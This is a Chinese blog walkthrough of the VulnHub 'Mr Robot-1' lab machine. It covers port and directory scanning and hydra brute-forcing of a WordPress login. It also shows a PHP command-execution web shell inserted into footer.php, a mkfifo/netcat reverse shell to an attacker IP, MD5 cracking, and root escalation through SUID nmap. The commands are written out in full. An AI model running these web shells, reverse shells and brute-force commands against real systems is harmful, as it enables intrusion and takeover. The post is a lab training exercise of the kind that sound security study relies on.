vulnhub渗透日记13: mr Robot-1

最新推荐文章于 2024-11-03 07:55:42 发布

_WHOAM1

最新推荐文章于 2024-11-03 07:55:42 发布

阅读量123

点赞数

分类专栏： Vulnhub靶机渗透日记文章标签： web安全 linux

本文链接：https://blog.csdn.net/ericalezl/article/details/131937259

版权

Vulnhub靶机渗透日记专栏收录该内容

22 篇文章 1 订阅

订阅专栏

前言

⏰时间：2023.7.26
🗺️靶机地址：https://www.vulnhub.com/entry/mr-robot-1,151/
⚠️文中涉及操作均在靶机模拟环境中完成，切勿未经授权用于真实环境。
🙏本人水平有限，如有错误望指正，感谢您的查阅！
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

主机发现

PS D:\> nmap -sn 192.168.58.1/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-25 20:47 中国标准时间
Nmap scan report for 192.168.58.153
Host is up (0.00013s latency).
MAC Address: 00:0C:29:54:2C:8C (VMware)
Nmap scan report for 192.168.58.159
Host is up (0.00s latency).
MAC Address: 00:0C:29:CC:79:91 (VMware)
Nmap scan report for 192.168.58.254
Host is up (0.00s latency).
MAC Address: 00:50:56:E2:C0:4E (VMware)
Nmap scan report for 192.168.58.1
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 6.89 seconds

目标是192.168.58.159

端口探测

PS D:\> nmap  192.168.58.159
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-25 20:52 中国标准时间
Nmap scan report for 192.168.58.159
Host is up (0.00037s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https
MAC Address: 00:0C:29:CC:79:91 (VMware)

PS D:\> nmap -sS -A -T4 -v -p 80,443 192.168.58.159
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-server-header: Apache
443/tcp open  ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Issuer: commonName=www.example.com
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015-09-16T10:45:03
| Not valid after:  2025-09-13T10:45:03
| MD5:   3c163b1987c342ad6634c1c9d0aafb97
|_SHA-1: ef0c5fa5931a09a5687ca2c280c4c79207cef71b
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
MAC Address: 00:0C:29:CC:79:91 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9
Uptime guess: 0.002 days (since Tue Jul 25 20:50:40 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=251 (Good luck!)
IP ID Sequence Generation: All zeros

GETKEY1

网站扫描

┌──(root㉿kali)-[~]
└─# nikto -h  http://192.168.58.159
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.58.159
+ Target Hostname:    192.168.58.159
+ Target Port:        80
+ Start Time:         2023-07-25 21:30:38 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /SKFr03IP.2: Retrieved x-powered-by header: PHP/5.5.29.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.html, index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /admin/: This might be interesting.
+ /image/: Drupal Link header found with value: <http://192.168.58.159/?p=23>; rel=shortlink. See: https://www.drupal.org/
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ /wp-login/: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found.
+ /wordpress/wp-admin/wp-login.php: Wordpress login found.
+ /blog/wp-login.php: Wordpress login found.
+ /wp-login.php: Wordpress login found.
+ /wordpress/wp-login.php: Wordpress login found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2023-07-25 21:32:52 (GMT8) (134 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

网站存在wordpress
扫目录

┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.58.159 -t 45 -f -e php

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php | HTTP method: GET | Threads: 45 | Wordlist size: 13441

Output File: /root/.dirsearch/reports/192.168.58.159/_23-07-25_21-46-22.txt

Error Log: /root/.dirsearch/logs/errors-23-07-25_21-46-22.log

Target: http://192.168.58.159/

[21:46:42] 200 -    8KB - /0/
[21:47:18] 200 -    1KB - /admin/
[21:47:19] 200 -    1KB - /admin/?/login.php
[21:47:19] 200 -    1KB - /admin/?/login
[21:47:19] 200 -    1KB - /admin/?/login/
[21:47:21] 200 -    1KB - /admin/index
[21:48:18] 200 -    0B  - /favicon.ico
[21:48:19] 200 -  813B  - /feed/
[21:48:28] 200 -   15KB - /image/
[21:48:29] 200 -    1KB - /index.html
[21:48:34] 200 -  504KB - /intro
[21:48:38] 200 -   19KB - /license
[21:48:38] 200 -   19KB - /license.txt
[21:49:13] 200 -   10KB - /readme
[21:49:13] 200 -   10KB - /readme.html
[21:49:15] 200 -   41B  - /robots.txt
[21:49:23] 200 -    0B  - /sitemap
[21:49:23] 200 -    0B  - /sitemap.xml
[21:49:23] 200 -    0B  - /sitemap.xml.gz
[21:49:45] 200 -    1B  - /wp-admin/admin-ajax.php
[21:49:46] 200 -    0B  - /wp-config.php
[21:49:46] 200 -    0B  - /wp-content/
[21:49:46] 200 -    0B  - /wp-content/plugins/google-sitemap-generator/sitemap-core.php
[21:49:46] 200 -    0B  - /wp-cron.php
[21:49:47] 200 -    3KB - /wp-login.php
[21:49:47] 200 -    3KB - /wp-login
[21:49:47] 200 -    3KB - /wp-login/

Task Completed

访问robots.txt

User-agent: *
fsocity.dic
key-1-of-3.txt

访问下载fsocity.dic是个字典

true
false
wikia
from
the
now
Wikia
extensions
scss
window
http
var
page
Robot
Elliot
...

字典看着很庞大，可以先去重

┌──(eric㉿Eric)-[/mnt/d/XunleiDownload]
└─$ sort -u fsocity.txt > wordlist.txt

┌──(eric㉿Eric)-[/mnt/d/XunleiDownload]
└─$ wc -l fsocity.txt wordlist.txt
 858160 fsocity.txt
  11451 wordlist.txt
 869611 total

去重之后只剩11451行数据
key-1-of-3.txt 是其中一个key

073403c8a58a1f80d943455fb30724b9

爆破登录口

访问wp-login，输入弱密码尝试，返回提示Invalid username
在这里插入图片描述可以利用刚才的字典进行爆破
可以用burp爆破，得出用户名elliot
或者用hydra去爆破，可以按f12找到post请求体，复制
使用hydra的http-post-form协议去爆破

┌──(eric㉿Eric)-[/mnt/d/XunleiDownload]
└─$ hydra -L wordlist.txt -p password 192.168.58.159 -t 45 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=https%3A%2F%2F192.168.58.159%2Fwp-admin%2F&testcookie=1:Invalid username"

在这里插入图片描述同样得到正确的用户名elliot
然后如法炮制爆破密码

┌──(eric㉿Eric)-[/mnt/d/XunleiDownload]
└─$ hydra -l elliot -P wordlist.txt 192.168.58.159 -t 45 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=https%3A%2F%2F192.168.58.159%2Fwp-admin%2F&testcookie=1:is incorrect"

在这里插入图片描述得到密码：ER28-0652

寻找漏洞点

登录wordpress后找漏洞功能点
在这里插入图片描述这里可以直接编辑，在footer.php写入恶意代码：

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

点击下面的update file保存更改

GETSHELL

https://192.168.58.159/wordpress/footer.php?cmd=echo+%27ls%27|bash

在这里插入图片描述说明目标系统支持bash
查看对方nc命令和版本

which nc; nc -h 2>&1 #将标准错误和标准输出一起显示，不然不显示帮助信息
https://192.168.58.159/wordpress/footer.php?cmd=which%20nc%3B%20nc%20-h%202%3E%261

在这里插入图片描述 nc版本不支持nc -e反弹shell
下面用fifo方法反弹shell

rm -f /tmp/f;mkfifo /tmp/f;bash < /tmp/f | nc 192.168.58.153 5555 > /tmp/f
https://192.168.58.159/wordpress/footer.php?cmd=rm%20-rf%20/tmp/f;%20mkfifo%20/tmp/f;%20bash%20%3C%20/tmp/f%20|%20nc%20192.168.58.153%205555%20%3E%20/tmp/f

收到shell
在这里插入图片描述 python -c 'import pty;pty.spawn("/bin/bash")'
查看wp-config.php获得数据库账号密码
先看看home下有什么
key2读不了，没权限

GET key2

看来只有robot用户才可以读取
看到password.raw-md5，看权限是644，我们可以读取

daemon@linux:/home/robot$ cat pass*
cat pass*
robot:c3fcd3d76192e4007dfb496cca67e13b

应该是robot的密码md5值，去网站解密，https://hashes.com/en/decrypt/hash
在这里插入图片描述密码为abcdefghijklmnopqrstuvwxyz
直接su robot切换用户，拿到key2

GETROOTKEY3

先看下是不是sudo用户
在这里插入图片描述看下有没有suid提取
发现nmap具有s权限，参考https://gtfobins.github.io/gtfobins/nmap/

robot@linux:~$ /usr/local/bin/nmap --interactive
/usr/local/bin/nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# ls /root
ls /root
firstboot_done  key-3-of-3.txt
# cat /root/key*
cat /root/key*
04787ddef27c3dee1ee161b21670b4e4